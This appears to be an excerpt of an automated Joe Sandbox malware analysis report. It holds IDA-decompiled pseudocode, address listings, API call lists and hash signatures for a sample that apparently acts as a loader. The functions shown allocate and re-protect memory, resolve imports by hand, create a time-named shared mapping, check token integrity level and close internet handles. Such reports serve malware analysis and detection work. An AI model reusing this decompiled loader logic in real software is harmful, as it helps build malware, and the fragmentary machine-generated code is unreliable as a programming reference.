						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































          0x005e7fd4
          0x005e7fea
          0x005e7ff0
          0x005e7ff2
          0x005e7ff7
          0x005e7ffd
          0x005e8002
          0x005e8005
          0x005e8013
          0x005e801a
          0x005e801d
          0x005e8020
          0x005e8021
          0x005e8024
          0x005e8027
          0x005e802a
          0x005e802f
          0x005e803e
          0x00000000
          0x005e8044
          0x005e804e
          0x005e8058
          0x005e805d
          0x005e805f
          0x005e8069
          0x005e806c
          0x005e806f
          0x005e8075
          0x005e8077
          0x005e8077
          0x005e807a
          0x005e807d
          0x005e8082
          0x005e8086
          0x005e8099
          0x005e809b
          0x005e8143
          0x005e8143
          0x005e814a
          0x005e814d
          0x005e8157
          0x005e8157
          0x005e815b
          0x005e81d9
          0x005e81dc
          0x005e81de
          0x005e81de
          0x005e81e5
          0x005e81e7
          0x005e81f1
          0x005e81f4
          0x005e81f7
          0x005e81f7
          0x00000000
          0x005e815d
          0x005e8160
          0x005e818e
          0x005e8198
          0x005e819c
          0x005e81a4
          0x005e81a7
          0x005e81ae
          0x005e81b8
          0x005e81b8
          0x005e81bc
          0x005e81c1
          0x005e81d0
          0x005e81d6
          0x005e81d6
          0x005e81bc
          0x00000000
          0x005e8167
          0x005e816a
          0x005e8172
          0x005e8187
          0x005e818c
          0x00000000
          0x00000000
          0x005e818c
          0x00000000
          0x005e8172
          0x005e8160
          0x005e815b
          0x005e80a1
          0x005e80a8
          0x005e80b8
          0x005e80bb
          0x005e80c1
          0x005e80c5
          0x005e8108
          0x005e8114
          0x005e813d
          0x005e8116
          0x005e811a
          0x005e8120
          0x005e8128
          0x005e812a
          0x005e812d
          0x005e8133
          0x005e8135
          0x005e8135
          0x005e8128
          0x005e811a
          0x00000000
          0x005e8114
          0x005e80cd
          0x005e80d0
          0x005e80d7
          0x005e80e7
          0x005e80ea
          0x005e80fa
          0x00000000
          0x005e8100
          0x005e80e1
          0x005e80e5
          0x00000000
          0x00000000
          0x00000000
          0x005e80e5
          0x005e80b2
          0x005e80b6
          0x00000000
          0x00000000
          0x00000000
          0x005e80b6
          0x005e808f
          0x005e8093
          0x00000000
          0x00000000
          0x00000000

          APIs
          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005E803E
          • LoadLibraryA.KERNELBASE(?), ref: 005E80BB
          • GetLastError.KERNEL32 ref: 005E80C7
          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 005E80FA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: ExceptionRaise$ErrorLastLibraryLoad
          • String ID: $$@MqtNqt
          • API String ID: 948315288-516465142
          • Opcode ID: a06a9a5b329b4f0939bbae2b4c5f763b1a7e9fd4d96da416f0762adbe3df5971
          • Instruction ID: 9f4edfd0f70f9fa2b6612637495ff1cf2665bb0a2372246a78dc7ec58e7d4d26
          • Opcode Fuzzy Hash: a06a9a5b329b4f0939bbae2b4c5f763b1a7e9fd4d96da416f0762adbe3df5971
          • Instruction Fuzzy Hash: B0811D71A00645AFDB18CFA9D884BAEBBF5FF58310F144429E989E7350EB70EA45CB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E415A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 225 5e415a-5e41c7 GetSystemTimeAsFileTime _aulldiv _snwprintf CreateFileMappingW 226 5e420f-5e4215 225->226 227 5e41c9-5e41d6 GetLastError 225->227 234 5e4217-5e421c 226->234 228 5e41dd-5e41ee MapViewOfFile 227->228 229 5e41d8-5e41db 227->229 232 5e41fe-5e4204 GetLastError 228->232 233 5e41f0-5e41fc 228->233 231 5e4206-5e420d CloseHandle 229->231 231->234 232->231 232->234 233->234
          C-Code - Quality: 74%
          			E005E415A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L005E82D4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x5ea348; // 0x25dd5a8
				_t5 = _t13 + 0x5eb7b4; // 0x2bc8d5c
				_t6 = _t13 + 0x5eb644; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L005E7F3A();
				_t17 = CreateFileMappingW(0xffffffff, 0x5ea34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













          0x005e415a
          0x005e4162
          0x005e4166
          0x005e416c
          0x005e4171
          0x005e4176
          0x005e4179
          0x005e417c
          0x005e4181
          0x005e4182
          0x005e4185
          0x005e418a
          0x005e4191
          0x005e419b
          0x005e419d
          0x005e419e
          0x005e41a1
          0x005e41bd
          0x005e41c3
          0x005e41c7
          0x005e4215
          0x005e41c9
          0x005e41d6
          0x005e41e6
          0x005e41ee
          0x005e4200
          0x005e4204
          0x00000000
          0x00000000
          0x005e41f0
          0x005e41f3
          0x005e41f8
          0x005e41fa
          0x005e41fa
          0x005e41d8
          0x005e41da
          0x005e4206
          0x005e4207
          0x005e4207
          0x005e41d6
          0x005e421c

          APIs
          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,005E25B1,?,?,4D283A53,?,?), ref: 005E4166
          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 005E417C
          • _snwprintf.NTDLL ref: 005E41A1
          • CreateFileMappingW.KERNELBASE(000000FF,005EA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 005E41BD
          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,005E25B1,?,?,4D283A53,?), ref: 005E41CF
          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 005E41E6
          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,005E25B1,?,?,4D283A53), ref: 005E4207
          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,005E25B1,?,?,4D283A53,?), ref: 005E420F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
          • String ID: @MqtNqt
          • API String ID: 1814172918-2883916605
          • Opcode ID: 1896fdf51b65086510445f532694e456ed312752eca32065ad12cfe4aea071f4
          • Instruction ID: f7ec9c92dca3c7f4929c140db449cd059e75d57f1b96e9843123322a63de6e9f
          • Opcode Fuzzy Hash: 1896fdf51b65086510445f532694e456ed312752eca32065ad12cfe4aea071f4
          • Instruction Fuzzy Hash: C921D5B6640284BBDB29DF65CC49F9E3BB9BB94750F210020F685EB2D0D7709905DB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005C003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 257 5c003c-5c0047 258 5c004c-5c0263 call 5c0a3f call 5c0e0f call 5c0d90 VirtualAlloc 257->258 259 5c0049 257->259 275 5c028b-5c0292 258->275 276 5c0265-5c0289 call 5c0a69 258->276 259->258 277 5c02a1-5c02b0 275->277 279 5c02ce-5c03c2 VirtualProtect call 5c0cce call 5c0ce7 276->279 277->279 280 5c02b2-5c02cc 277->280 287 5c03d1-5c03e0 279->287 280->279 282 5c0294-5c029b 280->282 282->277 288 5c0439-5c04b8 VirtualFree 287->288 289 5c03e2-5c0437 call 5c0ce7 287->289 291 5c04be-5c04cd 288->291 292 5c05f4-5c05fe 288->292 289->287 294 5c04d3-5c04dd 291->294 295 5c077f-5c0789 292->295 296 5c0604-5c060d 292->296 294->292 300 5c04e3-5c0505 LoadLibraryA 294->300 298 5c078b-5c07a3 295->298 299 5c07a6-5c07b0 295->299 296->295 301 5c0613-5c0637 296->301 298->299 302 5c086e-5c08be LoadLibraryA 299->302 303 5c07b6-5c07cb 299->303 304 5c0517-5c0520 300->304 305 5c0507-5c0515 300->305 306 5c063e-5c0648 301->306 310 5c08c7-5c08f9 302->310 307 5c07d2-5c07d5 303->307 308 5c0526-5c0547 304->308 305->308 306->295 309 5c064e-5c065a 306->309 311 5c0824-5c0833 307->311 312 5c07d7-5c07e0 307->312 313 5c054d-5c0550 308->313 309->295 314 5c0660-5c066a 309->314 316 5c08fb-5c0901 310->316 317 5c0902-5c091d 310->317 315 5c0839-5c083c 311->315 318 5c07e4-5c0822 312->318 319 5c07e2 312->319 320 5c0556-5c056b 313->320 321 5c05e0-5c05ef 313->321 322 5c067a-5c0689 314->322 315->302 323 5c083e-5c0847 315->323 316->317 318->307 319->311 326 5c056d 320->326 327 5c056f-5c057a 320->327 321->294 324 5c068f-5c06b2 322->324 325 5c0750-5c077a 322->325 330 5c0849 323->330 331 5c084b-5c086c 323->331 332 5c06ef-5c06fc 324->332 333 5c06b4-5c06ed 324->333 325->306 326->321 328 5c057c-5c0599 327->328 329 5c059b-5c05bb 327->329 341 5c05bd-5c05db 328->341 329->341 330->302 331->315 335 5c06fe-5c0748 332->335 336 5c074b 332->336 333->332 335->336 336->322 341->313
          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005C024D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: AllocVirtual
          • String ID: cess$kernel32.dll
          • API String ID: 4275171209-1230238691
          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
          • Instruction ID: 6ecb9a989f5fd5804ff419ab53124b423b4e5802c40885b424a45b5415c66c11
          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
          • Instruction Fuzzy Hash: D2526974A01229DFDB64CF98C985BA8BBB1BF09304F1480D9E54DAB391DB30AE95DF14
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E4BE7 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 342 5e4be7-5e4bf2 343 5e4bfe-5e4c11 342->343 344 5e4bf4-5e4bf9 call 5e16b2 342->344 346 5e4c1c-5e4c21 343->346 347 5e4c13-5e4c1a InternetSetStatusCallback InternetCloseHandle 343->347 344->343 348 5e4c2c-5e4c31 346->348 349 5e4c23-5e4c2a InternetSetStatusCallback InternetCloseHandle 346->349 347->346 350 5e4c3c-5e4c47 348->350 351 5e4c33-5e4c3a InternetSetStatusCallback InternetCloseHandle 348->351 349->348 352 5e4c4c-5e4c51 350->352 353 5e4c49-5e4c4a CloseHandle 350->353 351->350 354 5e4c56-5e4c5d 352->354 355 5e4c53-5e4c54 CloseHandle 352->355 353->352 356 5e4c5f-5e4c68 call 5e61da 354->356 357 5e4c6b-5e4c70 354->357 355->354 356->357 359 5e4c78-5e4c7c 357->359 360 5e4c72-5e4c73 call 5e61da 357->360 363 5e4c7e-5e4c7f call 5e61da 359->363 364 5e4c84-5e4c89 359->364 360->359 363->364 366 5e4c8b-5e4c8c call 5e61da 364->366 367 5e4c91-5e4c93 364->367 366->367
          C-Code - Quality: 93%
          			E005E4BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E005E16B2(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E005E61DA(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E005E61DA(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E005E61DA(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E005E61DA(_t46);
				}
				return _t24;
			}












          0x005e4be7
          0x005e4be7
          0x005e4be9
          0x005e4beb
          0x005e4bf2
          0x005e4bf9
          0x005e4bf9
          0x005e4bfe
          0x005e4c01
          0x005e4c08
          0x005e4c11
          0x005e4c15
          0x005e4c1a
          0x005e4c1a
          0x005e4c1c
          0x005e4c21
          0x005e4c25
          0x005e4c2a
          0x005e4c2a
          0x005e4c2c
          0x005e4c31
          0x005e4c35
          0x005e4c3a
          0x005e4c3a
          0x005e4c3c
          0x005e4c47
          0x005e4c4a
          0x005e4c4a
          0x005e4c4c
          0x005e4c51
          0x005e4c54
          0x005e4c54
          0x005e4c56
          0x005e4c5d
          0x005e4c60
          0x005e4c65
          0x005e4c68
          0x005e4c68
          0x005e4c6b
          0x005e4c70
          0x005e4c73
          0x005e4c73
          0x005e4c78
          0x005e4c7c
          0x005e4c7f
          0x005e4c7f
          0x005e4c84
          0x005e4c89
          0x00000000
          0x005e4c8c
          0x005e4c93

          APIs
          • InternetSetStatusCallback.WININET(?,00000000), ref: 005E4C15
          • InternetCloseHandle.WININET(?), ref: 005E4C1A
          • InternetSetStatusCallback.WININET(?,00000000), ref: 005E4C25
          • InternetCloseHandle.WININET(?), ref: 005E4C2A
          • InternetSetStatusCallback.WININET(?,00000000), ref: 005E4C35
          • InternetCloseHandle.WININET(?), ref: 005E4C3A
          • CloseHandle.KERNEL32(?,00000000,00000102,?,?,005E2248,?,?,747581D0,00000000,00000000), ref: 005E4C4A
          • CloseHandle.KERNEL32(?,00000000,00000102,?,?,005E2248,?,?,747581D0,00000000,00000000), ref: 005E4C54
            • Part of subcall function 005E16B2: WaitForMultipleObjects.KERNEL32(00000002,005E7C47,00000000,005E7C47,?,?,?,005E7C47,0000EA60), ref: 005E16CD
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
          • String ID:
          • API String ID: 2824497044-0
          • Opcode ID: a1f244e896f1548046e1a13531ac598fdabc65f1011b04913e498cdf03e0c9d4
          • Instruction ID: 6a760ba1a49f5ce1ef114c6dbadaefb55d6b586030d57b2f52b050013507cd62
          • Opcode Fuzzy Hash: a1f244e896f1548046e1a13531ac598fdabc65f1011b04913e498cdf03e0c9d4
          • Instruction Fuzzy Hash: 3C112C76600A985BC638AFABDD88C1BBBEDBB543413650D18F0C9D3511C724FC498A64
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E5E40 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 395 5e5e40-5e5e5b 396 5e5efa-5e5f06 395->396 397 5e5e61-5e5e7a OpenProcessToken 395->397 398 5e5e7c-5e5ea7 GetTokenInformation * 2 397->398 399 5e5ef9 397->399 400 5e5eef-5e5ef8 CloseHandle 398->400 401 5e5ea9-5e5eb6 call 5e33dc 398->401 399->396 400->399 404 5e5eee 401->404 405 5e5eb8-5e5ec9 GetTokenInformation 401->405 404->400 406 5e5ecb-5e5ee5 GetSidSubAuthorityCount GetSidSubAuthority 405->406 407 5e5ee8-5e5ee9 call 5e61da 405->407 406->407 407->404
          C-Code - Quality: 100%
          			E005E5E40(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x5ea2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E005E33DC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E005E61DA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









          0x005e5e4d
          0x005e5e54
          0x005e5e5b
          0x005e5e6f
          0x005e5e7a
          0x005e5e92
          0x005e5e9f
          0x005e5ea2
          0x005e5ea7
          0x005e5eb2
          0x005e5eb6
          0x005e5ec5
          0x005e5ec9
          0x005e5ee5
          0x005e5ee5
          0x005e5ee9
          0x005e5ee9
          0x005e5eee
          0x005e5ef2
          0x005e5ef8
          0x005e5ef9
          0x005e5f00
          0x005e5f06

          APIs
          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 005E5E72
          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 005E5E92
          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 005E5EA2
          • CloseHandle.KERNEL32(00000000), ref: 005E5EF2
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 005E5EC5
          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 005E5ECD
          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 005E5EDD
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
          • String ID:
          • API String ID: 1295030180-0
          • Opcode ID: 96ab79af4fdffb97575ee78461af1b32587eae6ca556df2ca61448c7334f5b98
          • Instruction ID: 76606cf997efe539bf68c5e5839de5094933ce32691a639017f3159105f481c7
          • Opcode Fuzzy Hash: 96ab79af4fdffb97575ee78461af1b32587eae6ca556df2ca61448c7334f5b98
          • Instruction Fuzzy Hash: 4B213975900299BFEB04DFA1CC88EAEBF79FB48304F0000A5E950A6161DB719B44EB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E6675 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
          Download Yara Rule

          Control-flow Graph

          C-Code - Quality: 64%
          			E005E6675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x5ea348; // 0x25dd5a8
				_t1 = _t9 + 0x5eb516; // 0x253d7325
				_t36 = 0;
				_t28 = E005E5815(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x2bc9601
					_t40 = E005E33DC(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E005E5063(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E005E61DA(_t40);
						_t42 = E005E4AC7(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E005E61DA(_t36);
							_t36 = _t42;
						}
						_t43 = E005E2708(_t36, _t33);
						if(_t43 != 0) {
							E005E61DA(_t36);
							_t36 = _t43;
						}
					}
					E005E61DA(_t28);
				}
				return _t36;
			}
















          0x005e6675
          0x005e6678
          0x005e6679
          0x005e6680
          0x005e6687
          0x005e668e
          0x005e6692
          0x005e6699
          0x005e66a0
          0x005e66a5
          0x005e66ad
          0x005e66b7
          0x005e66bb
          0x005e66bf
          0x005e66c5
          0x005e66ca
          0x005e66d4
          0x005e66da
          0x005e66dc
          0x005e66f3
          0x005e66f7
          0x005e66fa
          0x005e66ff
          0x005e66ff
          0x005e6708
          0x005e670c
          0x005e670f
          0x005e6714
          0x005e6714
          0x005e670c
          0x005e6717
          0x005e671c
          0x005e6722

          APIs
            • Part of subcall function 005E5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,005E668E,253D7325,00000000,00000000,?,775EC740,005E3ECE), ref: 005E587C
            • Part of subcall function 005E5815: sprintf.NTDLL ref: 005E589D
          • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A0
          • lstrlen.KERNEL32(00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A8
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • strcpy.NTDLL ref: 005E66BF
          • lstrcat.KERNEL32(00000000,00000000), ref: 005E66CA
            • Part of subcall function 005E5063: lstrlen.KERNEL32(00000000,00000000,005E3ECE,00000000,?,005E66D9,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E5074
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66E7
            • Part of subcall function 005E4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,005E66F3,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E4AD1
            • Part of subcall function 005E4AC7: _snprintf.NTDLL ref: 005E4B2F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
          • String ID: =
          • API String ID: 2864389247-1428090586
          • Opcode ID: 8e2c4319568cc5cf27479d545436b38e5201e3f6493cd26c8a995f949a2427ab
          • Instruction ID: c9bce19c844b8315d34dff51dc3cbd97c17409e87b4c1244d2b771fbd010f643
          • Opcode Fuzzy Hash: 8e2c4319568cc5cf27479d545436b38e5201e3f6493cd26c8a995f949a2427ab
          • Instruction Fuzzy Hash: D411E7739006A667461EBB768CC9C6F3FADBE987E43040016F980AB102DE74DD0597A1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00401202 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 435 401202-401214 call 4012e6 438 4012d5 435->438 439 40121a-40124f GetModuleHandleA GetProcAddress 435->439 442 4012dc-4012e3 438->442 440 401251-401265 GetProcAddress 439->440 441 4012cd-4012d3 call 401ba9 439->441 440->441 443 401267-40127b GetProcAddress 440->443 441->442 443->441 445 40127d-401291 GetProcAddress 443->445 445->441 447 401293-4012a7 GetProcAddress 445->447 447->441 448 4012a9-4012ba call 40110b 447->448 450 4012bf-4012c4 448->450 450->441 451 4012c6-4012cb 450->451 451->442
          C-Code - Quality: 100%
          			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E004012E6(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401BA9(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E0040110B(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
